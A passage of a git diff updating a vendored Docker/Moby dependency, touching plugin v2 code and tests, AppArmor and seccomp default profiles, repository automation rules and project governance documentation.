"github.com/docker/docker/plugin" import ( "testing" "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/plugingetter" "github.com/docker/docker/plugin/v2" ) func TestFilterByCapNeg(t 
*testing.T) { p := v2.Plugin{PluginObj: types.Plugin{Name: "test:latest"}} - iType := types.PluginInterfaceType{"volumedriver", "docker", "1.0"} - i := types.PluginConfigInterface{"plugins.sock", []types.PluginInterfaceType{iType}} + iType := types.PluginInterfaceType{Capability: "volumedriver", Prefix: "docker", Version: "1.0"} + i := types.PluginConfigInterface{Socket: "plugins.sock", Types: []types.PluginInterfaceType{iType}} p.PluginObj.Config.Interface = i _, err := p.FilterByCap("foobar") @@ -22,8 +23,8 @@ func TestFilterByCapNeg(t *testing.T) { func TestFilterByCapPos(t *testing.T) { p := v2.Plugin{PluginObj: types.Plugin{Name: "test:latest"}} - iType := types.PluginInterfaceType{"volumedriver", "docker", "1.0"} - i := types.PluginConfigInterface{"plugins.sock", []types.PluginInterfaceType{iType}} + iType := types.PluginInterfaceType{Capability: "volumedriver", Prefix: "docker", Version: "1.0"} + i := types.PluginConfigInterface{Socket: "plugins.sock", Types: []types.PluginInterfaceType{iType}} p.PluginObj.Config.Interface = i _, err := p.FilterByCap("volumedriver") @@ -31,3 +32,33 @@ func TestFilterByCapPos(t *testing.T) { t.Fatalf("expected no error, got %v", err) } } + +func TestStoreGetPluginNotMatchCapRefs(t *testing.T) { + s := NewStore() + p := v2.Plugin{PluginObj: types.Plugin{Name: "test:latest"}} + + iType := types.PluginInterfaceType{Capability: "whatever", Prefix: "docker", Version: "1.0"} + i := types.PluginConfigInterface{Socket: "plugins.sock", Types: []types.PluginInterfaceType{iType}} + p.PluginObj.Config.Interface = i + + if err := s.Add(&p); err != nil { + t.Fatal(err) + } + + if _, err := s.Get("test", "volumedriver", plugingetter.Acquire); err == nil { + t.Fatal("exepcted error when getting plugin that doesn't match the passed in capability") + } + + if refs := p.GetRefCount(); refs != 0 { + t.Fatalf("reference count should be 0, got: %d", refs) + } + + p.PluginObj.Enabled = true + if _, err := s.Get("test", "volumedriver", 
plugingetter.Acquire); err == nil { + t.Fatal("exepcted error when getting plugin that doesn't match the passed in capability") + } + + if refs := p.GetRefCount(); refs != 0 { + t.Fatalf("reference count should be 0, got: %d", refs) + } +} diff --git a/vendor/github.com/docker/docker/plugin/v2/plugin.go b/vendor/github.com/docker/docker/plugin/v2/plugin.go index 93b489a14b..6852511c5e 100644 --- a/vendor/github.com/docker/docker/plugin/v2/plugin.go +++ b/vendor/github.com/docker/docker/plugin/v2/plugin.go @@ -1,27 +1,36 @@ -package v2 +package v2 // import "github.com/docker/docker/plugin/v2" import ( "fmt" + "net" + "path/filepath" "strings" "sync" + "time" - "github.com/docker/distribution/digest" "github.com/docker/docker/api/types" "github.com/docker/docker/pkg/plugingetter" "github.com/docker/docker/pkg/plugins" + "github.com/opencontainers/go-digest" + "github.com/opencontainers/runtime-spec/specs-go" ) // Plugin represents an individual plugin. type Plugin struct { - mu sync.RWMutex - PluginObj types.Plugin `json:"plugin"` // todo: embed struct - pClient *plugins.Client - refCount int - PropagatedMount string // TODO: make private - Rootfs string // TODO: make private + mu sync.RWMutex + PluginObj types.Plugin `json:"plugin"` // todo: embed struct + pClient *plugins.Client + refCount int + Rootfs string // TODO: make private Config digest.Digest Blobsums []digest.Digest + + modifyRuntimeSpec func(*specs.Spec) + + SwarmServiceID string + timeout time.Duration + addr net.Addr } const defaultPluginRuntimeDestination = "/run/docker/plugins" @@ -35,13 +44,17 @@ func (e ErrInadequateCapability) Error() string { return fmt.Sprintf("plugin does not provide %q capability", e.cap) } -// BasePath returns the path to which all paths returned by the plugin are relative to. -// For Plugin objects this returns the host path of the plugin container's rootfs. 
-func (p *Plugin) BasePath() string { - return p.Rootfs +// ScopedPath returns the path scoped to the plugin rootfs +func (p *Plugin) ScopedPath(s string) string { + if p.PluginObj.Config.PropagatedMount != "" && strings.HasPrefix(s, p.PluginObj.Config.PropagatedMount) { + // re-scope to the propagated mount path on the host + return filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount", strings.TrimPrefix(s, p.PluginObj.Config.PropagatedMount)) + } + return filepath.Join(p.Rootfs, s) } // Client returns the plugin client. +// Deprecated: use p.Addr() and manually create the client func (p *Plugin) Client() *plugins.Client { p.mu.RLock() defer p.mu.RUnlock() @@ -50,6 +63,7 @@ func (p *Plugin) Client() *plugins.Client { } // SetPClient set the plugin client. +// Deprecated: Hardcoded plugin client is deprecated func (p *Plugin) SetPClient(client *plugins.Client) { p.mu.Lock() defer p.mu.Unlock() @@ -140,6 +154,9 @@ next: } // it is, so lets update the settings in memory + if mount.Source == nil { + return fmt.Errorf("Plugin config has no mount source") + } *mount.Source = s.value continue next } @@ -157,6 +174,9 @@ next: } // it is, so lets update the settings in memory + if device.Path == nil { + return fmt.Errorf("Plugin config has no device path") + } *device.Path = s.value continue next } @@ -233,12 +253,59 @@ func (p *Plugin) AddRefCount(count int) { // Acquire increments the plugin's reference count // This should be followed up by `Release()` when the plugin is no longer in use. func (p *Plugin) Acquire() { - p.AddRefCount(plugingetter.ACQUIRE) + p.AddRefCount(plugingetter.Acquire) } // Release decrements the plugin's reference count // This should only be called when the plugin is no longer in use, e.g. 
with -// via `Acquire()` or getter.Get("name", "type", plugingetter.ACQUIRE) +// via `Acquire()` or getter.Get("name", "type", plugingetter.Acquire) func (p *Plugin) Release() { - p.AddRefCount(plugingetter.RELEASE) + p.AddRefCount(plugingetter.Release) +} + +// SetSpecOptModifier sets the function to use to modify the generated +// runtime spec. +func (p *Plugin) SetSpecOptModifier(f func(*specs.Spec)) { + p.mu.Lock() + p.modifyRuntimeSpec = f + p.mu.Unlock() +} + +// Timeout gets the currently configured connection timeout. +// This should be used when dialing the plugin. +func (p *Plugin) Timeout() time.Duration { + p.mu.RLock() + t := p.timeout + p.mu.RUnlock() + return t +} + +// SetTimeout sets the timeout to use for dialing. +func (p *Plugin) SetTimeout(t time.Duration) { + p.mu.Lock() + p.timeout = t + p.mu.Unlock() +} + +// Addr returns the net.Addr to use to connect to the plugin socket +func (p *Plugin) Addr() net.Addr { + p.mu.RLock() + addr := p.addr + p.mu.RUnlock() + return addr +} + +// SetAddr sets the plugin address which can be used for dialing the plugin. +func (p *Plugin) SetAddr(addr net.Addr) { + p.mu.Lock() + p.addr = addr + p.mu.Unlock() +} + +// Protocol is the protocol that should be used for interacting with the plugin. 
+func (p *Plugin) Protocol() string { + if p.PluginObj.Config.Interface.ProtocolScheme != "" { + return p.PluginObj.Config.Interface.ProtocolScheme + } + return plugins.ProtocolSchemeHTTPV1 } diff --git a/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go b/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go index e980e7f29a..58c432fcd6 100644 --- a/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go +++ b/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go @@ -1,23 +1,23 @@ -// +build linux - -package v2 +package v2 // import "github.com/docker/docker/plugin/v2" import ( "os" "path/filepath" + "runtime" "strings" "github.com/docker/docker/api/types" "github.com/docker/docker/oci" "github.com/docker/docker/pkg/system" - specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/opencontainers/runtime-spec/specs-go" "github.com/pkg/errors" ) // InitSpec creates an OCI spec from the plugin's config. func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) { s := oci.DefaultSpec() - s.Root = specs.Root{ + + s.Root = &specs.Root{ Path: p.Rootfs, Readonly: false, // TODO: all plugins should be readonly? settable in config? 
} @@ -32,6 +32,17 @@ func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) { return nil, errors.WithStack(err) } + if p.PluginObj.Config.PropagatedMount != "" { + pRoot := filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount") + s.Mounts = append(s.Mounts, specs.Mount{ + Source: pRoot, + Destination: p.PluginObj.Config.PropagatedMount, + Type: "bind", + Options: []string{"rbind", "rw", "rshared"}, + }) + s.Linux.RootfsPropagation = "rshared" + } + mounts := append(p.PluginObj.Config.Mounts, types.PluginMount{ Source: &execRoot, Destination: defaultPluginRuntimeDestination, @@ -42,7 +53,7 @@ func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) { if p.PluginObj.Config.Network.Type != "" { // TODO: if net == bridge, use libnetwork controller to create a new plugin-specific bridge, bind mount /etc/hosts and /etc/resolv.conf look at the docker code (allocateNetwork, initialize) if p.PluginObj.Config.Network.Type == "host" { - oci.RemoveNamespace(&s, specs.NamespaceType("network")) + oci.RemoveNamespace(&s, specs.LinuxNamespaceType("network")) } etcHosts := "/etc/hosts" resolvConf := "/etc/resolv.conf" @@ -60,6 +71,13 @@ func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) { Options: []string{"rbind", "ro"}, }) } + if p.PluginObj.Config.PidHost { + oci.RemoveNamespace(&s, specs.LinuxNamespaceType("pid")) + } + + if p.PluginObj.Config.IpcHost { + oci.RemoveNamespace(&s, specs.LinuxNamespaceType("ipc")) + } for _, mnt := range mounts { m := specs.Mount{ @@ -82,14 +100,8 @@ func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) { } } - if p.PluginObj.Config.PropagatedMount != "" { - p.PropagatedMount = filepath.Join(p.Rootfs, p.PluginObj.Config.PropagatedMount) - s.Linux.RootfsPropagation = "rshared" - } - if p.PluginObj.Config.Linux.AllowAllDevices { - rwm := "rwm" - s.Linux.Resources.Devices = []specs.DeviceCgroup{{Allow: true, Access: &rwm}} + s.Linux.Resources.Devices = []specs.LinuxDeviceCgroup{{Allow: true, Access: "rwm"}} } 
for _, dev := range p.PluginObj.Settings.Devices { path := *dev.Path @@ -102,7 +114,7 @@ func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) { } envs := make([]string, 1, len(p.PluginObj.Settings.Env)+1) - envs[0] = "PATH=" + system.DefaultPathEnv + envs[0] = "PATH=" + system.DefaultPathEnv(runtime.GOOS) envs = append(envs, p.PluginObj.Settings.Env...) args := append(p.PluginObj.Config.Entrypoint, p.PluginObj.Settings.Args...) @@ -115,7 +127,15 @@ func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) { s.Process.Cwd = cwd s.Process.Env = envs - s.Process.Capabilities = append(s.Process.Capabilities, p.PluginObj.Config.Linux.Capabilities...) + caps := s.Process.Capabilities + caps.Bounding = append(caps.Bounding, p.PluginObj.Config.Linux.Capabilities...) + caps.Permitted = append(caps.Permitted, p.PluginObj.Config.Linux.Capabilities...) + caps.Inheritable = append(caps.Inheritable, p.PluginObj.Config.Linux.Capabilities...) + caps.Effective = append(caps.Effective, p.PluginObj.Config.Linux.Capabilities...) + + if p.modifyRuntimeSpec != nil { + p.modifyRuntimeSpec(&s) + } return &s, nil } diff --git a/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go b/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go index e60fb8311e..5242fe124c 100644 --- a/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go +++ b/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go @@ -1,11 +1,11 @@ // +build !linux -package v2 +package v2 // import "github.com/docker/docker/plugin/v2" import ( "errors" - specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/opencontainers/runtime-spec/specs-go" ) // InitSpec creates an OCI spec from the plugin's config. 
diff --git a/vendor/github.com/docker/docker/plugin/v2/settable.go b/vendor/github.com/docker/docker/plugin/v2/settable.go index 79c6befc24..efda564705 100644 --- a/vendor/github.com/docker/docker/plugin/v2/settable.go +++ b/vendor/github.com/docker/docker/plugin/v2/settable.go @@ -1,4 +1,4 @@ -package v2 +package v2 // import "github.com/docker/docker/plugin/v2" import ( "errors" diff --git a/vendor/github.com/docker/docker/plugin/v2/settable_test.go b/vendor/github.com/docker/docker/plugin/v2/settable_test.go index 7183f3a679..f2bb0a482f 100644 --- a/vendor/github.com/docker/docker/plugin/v2/settable_test.go +++ b/vendor/github.com/docker/docker/plugin/v2/settable_test.go @@ -1,4 +1,4 @@ -package v2 +package v2 // import "github.com/docker/docker/plugin/v2" import ( "reflect" @@ -68,7 +68,7 @@ func TestIsSettable(t *testing.T) { } } -func TestUpdateSettinsEnv(t *testing.T) { +func TestUpdateSettingsEnv(t *testing.T) { contexts := []struct { env []string set settable diff --git a/vendor/github.com/docker/docker/poule.yml b/vendor/github.com/docker/docker/poule.yml index 61aab4551b..fe1cb3d103 100644 --- a/vendor/github.com/docker/docker/poule.yml +++ b/vendor/github.com/docker/docker/poule.yml @@ -3,6 +3,9 @@ pull_request: [ opened ] operations: - type: label + filters: { + ~labels: [ "status/0-triage", "status/1-design-review", "status/2-code-review", "status/3-docs-review", "status/4-merge" ], + } settings: { patterns: { status/0-triage: [ ".*" ], @@ -23,20 +26,15 @@ area/networking: [ "docker network", "ipvs", "vxlan" ], area/runtime: [ "oci runtime error" ], area/security/trust: [ "docker_content_trust" ], - area/swarm: [ "docker node", "docker service", "docker swarm" ], + area/swarm: [ "docker node", "docker swarm", "docker service create", "docker service inspect", "docker service logs", "docker service ls", "docker service ps", "docker service rm", "docker service scale", "docker service update" ], platform/desktop: [ "docker for mac", "docker for windows" 
], platform/freebsd: [ "freebsd" ], platform/windows: [ "nanoserver", "windowsservercore", "windows server" ], + platform/arm: [ "raspberry", "raspbian", "rpi", "beaglebone", "pine64" ], } } - type: version-label -# When a pull request is closed, attach it to the currently active milestone. -- triggers: - pull_request: [ closed ] - operations: - - type: version-milestone - # Labeling a PR with `rebuild/` triggers a rebuild job for the associated # configuration. The label is automatically removed after the rebuild is initiated. There's no such # thing as "templating" in this configuration, so we need one operation for each type of @@ -66,6 +64,11 @@ configurations: [ janky ], label: "rebuild/janky", } + - type: rebuild + settings: { + configurations: [ powerpc ], + label: "rebuild/powerpc", + } - type: rebuild settings: { configurations: [ userns ], @@ -86,3 +89,41 @@ configurations: [ windowsRS1 ], label: "rebuild/windowsRS1", } + - type: rebuild + settings: { + configurations: [ z ], + label: "rebuild/z", + } + +# Once a day, randomly assign pull requests older than 2 weeks. 
+- schedule: "@daily" + operations: + - type: random-assign + filters: { + age: "2w", + is: "pr", + } + settings: { + users: [ + "aaronlehmann", + "akihirosuda", + "coolljt0725", + "cpuguy83", + "crosbymichael", + "dnephin", + "duglin", + "fntlnz", + "johnstep", + "justincormack", + "mhbauer", + "mlaventure", + "runcom", + "stevvooe", + "thajeztah", + "tiborvass", + "tonistiigi", + "vdemeester", + "vieux", + "yongtang", + ] + } diff --git a/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go b/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go index 5132ebe008..b021668c8e 100644 --- a/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go +++ b/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go @@ -1,6 +1,6 @@ // +build linux -package apparmor +package apparmor // import "github.com/docker/docker/profiles/apparmor" import ( "bufio" @@ -9,9 +9,9 @@ import ( "os" "path" "strings" + "text/template" "github.com/docker/docker/pkg/aaparser" - "github.com/docker/docker/utils/templates" ) var ( @@ -33,7 +33,7 @@ type profileData struct { // generateDefault creates an apparmor profile from ProfileData. func (p *profileData) generateDefault(out io.Writer) error { - compiled, err := templates.NewParse("apparmor_profile", baseTemplate) + compiled, err := template.New("apparmor_profile").Parse(baseTemplate) if err != nil { return err } @@ -54,10 +54,7 @@ func (p *profileData) generateDefault(out io.Writer) error { } p.Version = ver - if err := compiled.Execute(out, p); err != nil { - return err - } - return nil + return compiled.Execute(out, p) } // macrosExists checks if the passed macro exists. 
@@ -84,15 +81,10 @@ func InstallDefault(name string) error { defer os.Remove(profilePath) if err := p.generateDefault(f); err != nil { - f.Close() - return err - } - - if err := aaparser.LoadProfile(profilePath); err != nil { return err } - return nil + return aaparser.LoadProfile(profilePath) } // IsLoaded checks if a profile with the given name has been loaded into the diff --git a/vendor/github.com/docker/docker/profiles/apparmor/template.go b/vendor/github.com/docker/docker/profiles/apparmor/template.go index c5ea4584de..c00a3f70e9 100644 --- a/vendor/github.com/docker/docker/profiles/apparmor/template.go +++ b/vendor/github.com/docker/docker/profiles/apparmor/template.go @@ -1,6 +1,6 @@ // +build linux -package apparmor +package apparmor // import "github.com/docker/docker/profiles/apparmor" // baseTemplate defines the default apparmor profile for containers. const baseTemplate = ` @@ -24,8 +24,6 @@ profile {{.Name}} flags=(attach_disconnected,mediate_deleted) { deny @{PROC}/sys/[^k]** w, # deny /proc/sys except /proc/sys/k* (effectively /proc/sys/kernel) deny @{PROC}/sys/kernel/{?,??,[^s][^h][^m]**} w, # deny everything except shm* in /proc/sys/kernel/ deny @{PROC}/sysrq-trigger rwklx, - deny @{PROC}/mem rwklx, - deny @{PROC}/kmem rwklx, deny @{PROC}/kcore rwklx, deny mount, diff --git a/vendor/github.com/docker/docker/profiles/seccomp/default.json b/vendor/github.com/docker/docker/profiles/seccomp/default.json index ac129d3a31..5717c00cde 100755 --- a/vendor/github.com/docker/docker/profiles/seccomp/default.json +++ b/vendor/github.com/docker/docker/profiles/seccomp/default.json @@ -55,7 +55,7 @@ "accept", "accept4", "access", - "alarm", + "adjtimex", "alarm", "bind", "brk", @@ -223,10 +223,12 @@ "prctl", "pread64", "preadv", + "preadv2", "prlimit64", "pselect6", "pwrite64", "pwritev", + "pwritev2", "read", "readahead", "readlink", @@ -320,6 +322,7 @@ "stat64", "statfs", "statfs64", + "statx", "symlink", "symlinkat", "sync", @@ -398,6 +401,40 @@ "includes": 
{}, "excludes": {} }, + { + "names": [ + "personality" + ], + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 131072, + "valueTwo": 0, + "op": "SCMP_CMP_EQ" + } + ], + "comment": "", + "includes": {}, + "excludes": {} + }, + { + "names": [ + "personality" + ], + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 131080, + "valueTwo": 0, + "op": "SCMP_CMP_EQ" + } + ], + "comment": "", + "includes": {}, + "excludes": {} + }, { "names": [ "personality" @@ -415,10 +452,25 @@ "includes": {}, "excludes": {} }, + { + "names": [ + "sync_file_range2" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "arches": [ + "ppc64le" + ] + }, + "excludes": {} + }, { "names": [ "arm_fadvise64_64", "arm_sync_file_range", + "sync_file_range2", "breakpoint", "cacheflush", "set_tls" @@ -505,6 +557,7 @@ "mount", "name_to_handle_at", "perf_event_open", + "quotactl", "setdomainname", "sethostname", "setns", @@ -668,7 +721,7 @@ "names": [ "settimeofday", "stime", - "adjtimex" + "clock_settime" ], "action": "SCMP_ACT_ALLOW", "args": [], diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go index a54ef50a8b..4438670a58 100644 --- a/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go +++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go @@ -1,6 +1,6 @@ // +build linux -package seccomp +package seccomp // import "github.com/docker/docker/profiles/seccomp" import ( "encoding/json" @@ -8,7 +8,6 @@ import ( "fmt" "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/stringutils" "github.com/opencontainers/runtime-spec/specs-go" libseccomp "github.com/seccomp/libseccomp-golang" ) @@ -16,12 +15,12 @@ import ( //go:generate go run -tags 'seccomp' generate.go // GetDefaultProfile returns the default seccomp profile. 
-func GetDefaultProfile(rs *specs.Spec) (*specs.Seccomp, error) { +func GetDefaultProfile(rs *specs.Spec) (*specs.LinuxSeccomp, error) { return setupSeccomp(DefaultProfile(), rs) } -// LoadProfile takes a file path and decodes the seccomp profile. -func LoadProfile(body string, rs *specs.Spec) (*specs.Seccomp, error) { +// LoadProfile takes a json string and decodes the seccomp profile. +func LoadProfile(body string, rs *specs.Spec) (*specs.LinuxSeccomp, error) { var config types.Seccomp if err := json.Unmarshal([]byte(body), &config); err != nil { return nil, fmt.Errorf("Decoding seccomp profile failed: %v", err) @@ -39,7 +38,18 @@ var nativeToSeccomp = map[string]types.Arch{ "s390x": types.ArchS390X, } -func setupSeccomp(config *types.Seccomp, rs *specs.Spec) (*specs.Seccomp, error) { +// inSlice tests whether a string is contained in a slice of strings or not. +// Comparison is case sensitive +func inSlice(slice []string, s string) bool { + for _, ss := range slice { + if s == ss { + return true + } + } + return false +} + +func setupSeccomp(config *types.Seccomp, rs *specs.Spec) (*specs.LinuxSeccomp, error) { if config == nil { return nil, nil } @@ -49,7 +59,7 @@ func setupSeccomp(config *types.Seccomp, rs *specs.Spec) (*specs.Seccomp, error) return nil, nil } - newConfig := &specs.Seccomp{} + newConfig := &specs.LinuxSeccomp{} var arch string var native, err = libseccomp.GetNativeArch() @@ -83,31 +93,31 @@ func setupSeccomp(config *types.Seccomp, rs *specs.Spec) (*specs.Seccomp, error) } } - newConfig.DefaultAction = specs.Action(config.DefaultAction) + newConfig.DefaultAction = specs.LinuxSeccompAction(config.DefaultAction) Loop: // Loop through all syscall blocks and convert them to libcontainer format after filtering them for _, call := range config.Syscalls { if len(call.Excludes.Arches) > 0 { - if stringutils.InSlice(call.Excludes.Arches, arch) { + if inSlice(call.Excludes.Arches, arch) { continue Loop } } if len(call.Excludes.Caps) > 0 { for _, c := 
range call.Excludes.Caps { - if stringutils.InSlice(rs.Process.Capabilities, c) { + if inSlice(rs.Process.Capabilities.Bounding, c) { continue Loop } } } if len(call.Includes.Arches) > 0 { - if !stringutils.InSlice(call.Includes.Arches, arch) { + if !inSlice(call.Includes.Arches, arch) { continue Loop } } if len(call.Includes.Caps) > 0 { for _, c := range call.Includes.Caps { - if !stringutils.InSlice(rs.Process.Capabilities, c) { + if !inSlice(rs.Process.Capabilities.Bounding, c) { continue Loop } } @@ -129,19 +139,19 @@ Loop: return newConfig, nil } -func createSpecsSyscall(name string, action types.Action, args []*types.Arg) specs.Syscall { - newCall := specs.Syscall{ - Name: name, - Action: specs.Action(action), +func createSpecsSyscall(name string, action types.Action, args []*types.Arg) specs.LinuxSyscall { + newCall := specs.LinuxSyscall{ + Names: []string{name}, + Action: specs.LinuxSeccompAction(action), } // Loop through all the arguments of the syscall and convert them for _, arg := range args { - newArg := specs.Arg{ + newArg := specs.LinuxSeccompArg{ Index: arg.Index, Value: arg.Value, ValueTwo: arg.ValueTwo, - Op: specs.Operator(arg.Op), + Op: specs.LinuxSeccompOperator(arg.Op), } newCall.Args = append(newCall.Args, newArg) diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go index b84de820b7..be29aa4f70 100644 --- a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go +++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go @@ -1,11 +1,10 @@ // +build linux,seccomp -package seccomp +package seccomp // import "github.com/docker/docker/profiles/seccomp" import ( - "syscall" - "github.com/docker/docker/api/types" + "golang.org/x/sys/unix" ) func arches() []types.Architecture { @@ -49,7 +48,7 @@ func DefaultProfile() *types.Seccomp { "accept", "accept4", "access", - "alarm", + "adjtimex", "alarm", "bind", "brk", @@ -217,10 
+216,12 @@ func DefaultProfile() *types.Seccomp { "prctl", "pread64", "preadv", + "preadv2", "prlimit64", "pselect6", "pwrite64", "pwritev", + "pwritev2", "read", "readahead", "readlink", @@ -314,6 +315,7 @@ func DefaultProfile() *types.Seccomp { "stat64", "statfs", "statfs64", + "statx", "symlink", "symlinkat", "sync", @@ -377,6 +379,28 @@ func DefaultProfile() *types.Seccomp { }, }, }, + { + Names: []string{"personality"}, + Action: types.ActAllow, + Args: []*types.Arg{ + { + Index: 0, + Value: 0x20000, + Op: types.OpEqualTo, + }, + }, + }, + { + Names: []string{"personality"}, + Action: types.ActAllow, + Args: []*types.Arg{ + { + Index: 0, + Value: 0x20008, + Op: types.OpEqualTo, + }, + }, + }, { Names: []string{"personality"}, Action: types.ActAllow, @@ -388,10 +412,21 @@ func DefaultProfile() *types.Seccomp { }, }, }, + { + Names: []string{ + "sync_file_range2", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Arches: []string{"ppc64le"}, + }, + }, { Names: []string{ "arm_fadvise64_64", "arm_sync_file_range", + "sync_file_range2", "breakpoint", "cacheflush", "set_tls", @@ -453,6 +488,7 @@ func DefaultProfile() *types.Seccomp { "mount", "name_to_handle_at", "perf_event_open", + "quotactl", "setdomainname", "sethostname", "setns", @@ -474,7 +510,7 @@ func DefaultProfile() *types.Seccomp { Args: []*types.Arg{ { Index: 0, - Value: syscall.CLONE_NEWNS | syscall.CLONE_NEWUTS | syscall.CLONE_NEWIPC | syscall.CLONE_NEWUSER | syscall.CLONE_NEWPID | syscall.CLONE_NEWNET, + Value: unix.CLONE_NEWNS | unix.CLONE_NEWUTS | unix.CLONE_NEWIPC | unix.CLONE_NEWUSER | unix.CLONE_NEWPID | unix.CLONE_NEWNET, ValueTwo: 0, Op: types.OpMaskedEqual, }, @@ -492,7 +528,7 @@ func DefaultProfile() *types.Seccomp { Args: []*types.Arg{ { Index: 1, - Value: syscall.CLONE_NEWNS | syscall.CLONE_NEWUTS | syscall.CLONE_NEWIPC | syscall.CLONE_NEWUSER | syscall.CLONE_NEWPID | syscall.CLONE_NEWNET, + Value: unix.CLONE_NEWNS | unix.CLONE_NEWUTS | unix.CLONE_NEWIPC | 
unix.CLONE_NEWUSER | unix.CLONE_NEWPID | unix.CLONE_NEWNET, ValueTwo: 0, Op: types.OpMaskedEqual, }, @@ -576,7 +612,7 @@ func DefaultProfile() *types.Seccomp { Names: []string{ "settimeofday", "stime", - "adjtimex", + "clock_settime", }, Action: types.ActAllow, Args: []*types.Arg{}, diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go index 134692147b..b0b63ea811 100644 --- a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go +++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go @@ -1,6 +1,6 @@ // +build linux -package seccomp +package seccomp // import "github.com/docker/docker/profiles/seccomp" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go index f84b20b6d9..67e06401f1 100644 --- a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go +++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go @@ -1,13 +1,12 @@ // +build linux,!seccomp -package seccomp +package seccomp // import "github.com/docker/docker/profiles/seccomp" import ( "github.com/docker/docker/api/types" - "github.com/opencontainers/runtime-spec/specs-go" ) // DefaultProfile returns a nil pointer on unsupported systems. 
-func DefaultProfile(rs *specs.Spec) *types.Seccomp { +func DefaultProfile() *types.Seccomp { return nil } diff --git a/vendor/github.com/docker/docker/project/ARM.md b/vendor/github.com/docker/docker/project/ARM.md index c4d21bf27a..c876231d1e 100644 --- a/vendor/github.com/docker/docker/project/ARM.md +++ b/vendor/github.com/docker/docker/project/ARM.md @@ -17,15 +17,15 @@ From the root of the Docker/Docker repo one can use make to execute the followin - make default - make shell - make test-unit -- make test-integration-cli +- make test-integration - make The Makefile does include logic to determine on which OS and architecture the Docker Development Image is built. Based on OS and architecture it chooses the correct Dockerfile. For the ARM 32bit architecture it uses `Dockerfile.armhf`. -So for example in order to build a Docker binary one has to -1. clone the Docker/Docker repository on an ARM device `git clone git@github.com:docker/docker.git` +So for example in order to build a Docker binary one has to: +1. clone the Docker/Docker repository on an ARM device `git clone https://github.com/docker/docker.git` 2. change into the checked out repository with `cd docker` 3. 
execute `make binary` to create a Docker Engine binary for ARM diff --git a/vendor/github.com/docker/docker/project/CONTRIBUTORS.md b/vendor/github.com/docker/docker/project/CONTRIBUTING.md similarity index 100% rename from vendor/github.com/docker/docker/project/CONTRIBUTORS.md rename to vendor/github.com/docker/docker/project/CONTRIBUTING.md diff --git a/vendor/github.com/docker/docker/project/GOVERNANCE.md b/vendor/github.com/docker/docker/project/GOVERNANCE.md index 6ae7baf743..4b52989a64 100644 --- a/vendor/github.com/docker/docker/project/GOVERNANCE.md +++ b/vendor/github.com/docker/docker/project/GOVERNANCE.md @@ -1,17 +1,120 @@ -# Docker Governance Advisory Board Meetings +# Moby project governance -In the spirit of openness, Docker created a Governance Advisory Board, and committed to make all materials and notes from the meetings of this group public. -All output from the meetings should be considered proposals only, and are subject to the review and approval of the community and the project leadership. +Moby projects are governed by the [Moby Technical Steering Committee (TSC)](https://github.com/moby/tsc). +See the Moby TSC [charter](https://github.com/moby/tsc/blob/master/README.md) for +further information on the role of the TSC and procedures for escalation +of technical issues or concerns. -The materials from the first Docker Governance Advisory Board meeting, held on October 28, 2014, are available at -[Google Docs Folder](https://goo.gl/Alfj8r) +Contact [any Moby TSC member](https://github.com/moby/tsc/blob/master/MEMBERS.md) with your questions/concerns about the governance or a specific technical +issue that you feel requires escalation. 
-These include: +## Project maintainers -* First Meeting Notes -* DGAB Charter -* Presentation 1: Introductory Presentation, including State of The Project -* Presentation 2: Overall Contribution Structure/Docker Project Core Proposal -* Presentation 3: Long Term Roadmap/Statement of Direction - +The current maintainers of the moby/moby repository are listed in the +[MAINTAINERS](/MAINTAINERS) file. +There are different types of maintainers, with different responsibilities, but +all maintainers have 3 things in common: + + 1. They share responsibility in the project's success. + 2. They have made a long-term, recurring time investment to improve the project. + 3. They spend that time doing whatever needs to be done, not necessarily what is the most interesting or fun. + +Maintainers are often under-appreciated, because their work is less visible. +It's easy to recognize a really cool and technically advanced feature. It's harder +to appreciate the absence of bugs, the slow but steady improvement in stability, +or the reliability of a release process. But those things distinguish a good +project from a great one. + +### Adding 